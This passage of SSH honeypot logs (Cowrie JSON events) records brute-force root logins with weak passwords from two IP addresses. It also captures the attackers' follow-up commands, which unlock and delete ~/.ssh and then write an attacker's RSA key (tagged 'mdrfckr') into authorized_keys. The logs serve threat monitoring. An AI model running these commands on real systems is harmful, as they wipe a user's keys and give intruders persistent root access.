.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:04:46.752528Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:47.146477Z","src_ip":"212.227.235.229","session":"f945857751b6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test123123","message":"login attempt [root/Test123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:04:47.493343Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:04:48.044466Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:04:48.045488Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:04:48.046772Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:48.295300Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:48.866951Z","src_ip":"212.227.235.229","session":"f945857751b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:04:50.814184Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:04:50.815016Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.063709Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.064722Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36306,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94db3d165e7","protocol":"ssh","message":"New connection: 212.227.235.229:36306 (1.2.3.4:22) [session: d94db3d165e7]","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.118449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.119705Z","src_ip":"212.227.235.229","session":"d94db3d165e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48392,"dst_ip":"1.2.3.4","dst_port":22,"session":"638f48fb6e09","protocol":"ssh","message":"New connection: 212.227.235.229:48392 (1.2.3.4:22) [session: 638f48fb6e09]","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.310399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.311780Z","src_ip":"212.227.235.229","session":"638f48fb6e09"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.387376Z","src_ip":"212.227.235.229","session":"d94db3d165e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.561713Z","src_ip":"212.227.235.229","session":"638f48fb6e09"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:51.680502Z","src_ip":"212.227.235.229","session":"80dd15b0d65c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:04:54.923246Z","src_ip":"212.227.235.229","session":"638f48fb6e09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48396,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c253a2d8d35","protocol":"ssh","message":"New connection: 212.227.235.229:48396 (1.2.3.4:22) [session: 2c253a2d8d35]","sensor":"my-vps","timestamp":"2025-08-26T04:04:56.429831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:04:56.430780Z","src_ip":"212.227.235.229","session":"2c253a2d8d35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:04:56.682911Z","src_ip":"212.227.235.229","session":"2c253a2d8d35"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:56.962005Z","src_ip":"212.227.235.229","session":"638f48fb6e09"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:04:57.731303Z","src_ip":"212.227.235.229","session":"2c253a2d8d35"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:57.980467Z","src_ip":"212.227.235.229","session":"885b23bb41c3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:04:57.984205Z","src_ip":"212.227.235.229","session":"2c253a2d8d35"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":52618,"dst_ip":"1.2.3.4","dst_port":22,"session":"280c9dd7e25d","protocol":"ssh","message":"New connection: 103.217.145.104:52618 (1.2.3.4:22) [session: 280c9dd7e25d]","sensor":"my-vps","timestamp":"2025-08-26T04:05:02.607599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:05:02.608752Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:05:02.883000Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53996,"dst_ip":"1.2.3.4","dst_port":22,"session":"af2c0cea9bc7","protocol":"ssh","message":"New connection: 212.227.235.229:53996 (1.2.3.4:22) [session: af2c0cea9bc7]","sensor":"my-vps","timestamp":"2025-08-26T04:05:03.032375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:03.033726Z","src_ip":"212.227.235.229","session":"af2c0cea9bc7"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:05:03.495453Z","src_ip":"212.227.235.229","session":"d94db3d165e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc123!!!","message":"login attempt [root/Abc123!!!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:05:04.027328Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:05:04.954205Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:05:04.955043Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:05:04.956781Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:05.237070Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:05:05.849293Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:05:05.850082Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.126788Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.127705Z","src_ip":"103.217.145.104","session":"280c9dd7e25d"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":52632,"dst_ip":"1.2.3.4","dst_port":22,"session":"4abcc1adaac7","protocol":"ssh","message":"New connection: 103.217.145.104:52632 (1.2.3.4:22) [session: 4abcc1adaac7]","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.386484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:05:06.387238Z","src_ip":"103.217.145.104","session":"4abcc1adaac7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":